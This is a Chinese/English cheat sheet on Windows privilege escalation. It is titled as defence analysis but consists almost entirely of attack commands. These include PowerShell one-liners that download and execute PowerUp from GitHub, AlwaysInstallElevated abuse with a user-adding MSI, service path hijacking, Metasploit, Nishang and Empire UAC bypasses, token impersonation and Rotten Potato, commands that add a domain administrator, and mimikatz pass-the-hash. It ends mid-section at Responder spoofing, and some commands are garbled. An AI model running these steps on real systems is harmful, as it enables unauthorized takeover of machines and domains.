权限提升防御分析

系统内核溢出漏洞提权

手动执行命令发现缺失补丁

1

2

systeminfo

wmic qfe get Caption, Description, HotfixID, InstalledOn

Discover patch number

1

wmic qfe get Caption,Description,HotfixID,InstalledOn | findstr C:'KB3143141' C:/'KB976902'

Windows Exploit Suggester

Use the systeminfo command to obtain the patch installation status of the current system and import the information into the patches.txt file.

Update patch information

1

python windows-exploit-suggester.py --update

Check for vulnerabilities

1

python windows-exploit-suggester.py -d 2019-02-02-mssb.xls -i patches.txt

Metasploit built-in local_exploit_suggester module

powershell 中的 sherlock 脚本

https://github.com/rasta-mouse/Sherlock

1

2

import-module .\Sherlock.ps1

Find-AllVulns

https://github.com/rasta-mouse/Watson

Windows 配置错误利用

系统服务权限配置错误

powerup

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privec

1

powershell.exe -exec bypass -Command '{Import-Module .\PowerUP.ps1;Invoke-AllChecks}'

1

powershell.exe -exec bypass -c 'IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks'

metasploit 下的利用

Corresponding module service_permissions.

注册表键 AlwaysInstallElevated

AlwaysInstallElevated is a policy setting. Microsoft allows unauthorized users to run installation files (MSI) with SYSTEM permissions. If the user enables this policy setting, hackers can use malicious MSI files to increase administrator rights. Assuming that we cannot obtain SYSTEM permissions through some conventional methods after getting the Meterpreter session of the target host, then the AlwaysInstallElevated privilege raising can bring us another idea.

Manually detect the registry:

1

2

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If the values are all 1, there is a risk

PowerUp Scripts

1

powershell.exe -exec bypass -c 'IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Get-RegistryAlwaysInstallElevated'

Add an account

1

Write-UserAddMSI

Run as a normal user

1

msiexec /q /i UserAdd.smi

You can also use the always_install_elevated module in msf

可信任服务路径漏洞

metasploit 下的利用

Detect whether there is a vulnerability in the target machine

1

wmic service get name,displayname,pathname,startmode|findstr /i 'Auto' | findstr /i /v 'C:\Windows\\'|findstr /i /v '''

Rename and place the program to be uploaded in this vulnerable and writable directory, and execute the following command:

1

2

sc stop service_name

sc start service_name

You can also use the Windows Service Trusted Path Privilege Escalation module in msf for testing

Note: msf To set set AutoRunScript migrate -f to prevent disconnection

自动安装配置文件

1

2

dir /b /s c:\Unattend.xml

dir /b /s c:\sysprep.xml

Check whether the encrypted password of base64 exists in the file

The exploit module for this vulnerability is integrated in msf post/windows/gather/enum_unattend

计划任务

查看计划任务

1

schtasks /query /fo LIST /v

查询可写的计划任务文件夹

1

accesschk.exe -dqc 'C:\Microsoft' -accepteula

列出某个驱动器下所有权限配置有缺陷的文件夹

1

2

accesschk.exe -uwdqsUsersc:\

accesschk.exe -uwdqs'AuthenticatedUsers'c:\

列出某个驱动器下所有权限配置有缺陷的文件

1

2

accesschk.exe -uwdqsUsersc:\*.*

accesschk.exe -uwdqs'AuthenticatedUsers'c:\*.*

Empire 内置模块

1

usermode privesc/powerup/xxxx

绕过 UAC 提权

bypassuac 模块

Prerequisite: The current user must be in the administrator group

1

2

3

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_inject

getsystem

RunAs 模块

1

exploit/windows/local/ask

A UAC box pops up, and a high-permission shell will pop back after the user clicks it.

1

getuid view permissions. If it is a normal user permission, execute getsystem to escalate permissions.

Nishang 中的 Invoke-PsUACme 模块

1

2

3

4

Invoke-PsUACme -Verbose ## Use Sysprep method and execute the default Payload

Invoke-PsUACme -method oobe -Verbose ## Use the oobe method and execute the default Payload

Invoke-PsUACme -Payload 'powershell -windowstyle hidden -e YourEncodedPayload'

## Use the -Payload parameter to specify the Payload to be executed by yourself.

Empire 中的 bypassuac 模块

bypassuac 模块

1

2

usemode privesc/bypassuac

execute

bypassuac_wscript 模块

1

2

usemode privesc/bypassuac_wscript

execute

令牌窃取

msf 上的令牌窃取

Assume that the meterpreter shell has been obtained

1

2

use incognito

list_tokens -u

Call impersonate_token in incognito

1

impersonate_token DESKTOP-DUNPKQ9\\Administrator

Note: When entering the hostname\username, you need to enter two backslashes

Rotten Potato 本地提权

1

2

3

4

use incognito

list_tokens -u

execute -HC -f rottenpotato.exe

impersonate_token 'NT AUTHORITY\\SYSTEM'

添加域管理员

Assuming that a domain-managed process is set up in the network, the process is migrated to the domain-managed process in the meterpreter shell

1

2

net user test test123!@# /ad /domain

net group 'domain admins' test /ad /domain

Similarly, in the meterpreter shell, you can use incognito to simulate a domain administrator and then add the domain administrator by iterating over all the authentication tokens available in the system.

Execute the following command in the active meterpreter shell:

1

add_user test test!@#123 -h 1.1.1.2

Execute the following command to add the account to the domain administrator group.

1

add_user 'Domain Admins' test -h 1.1.1.2

Empire 下的令牌窃取分析

Run mimikatz and enter creds

Execute :

1

pth CredID

无凭证下的权限获取

LLMNR 和 NetBIOS 欺骗攻击

Responder 工具

Turn on the monitoring mode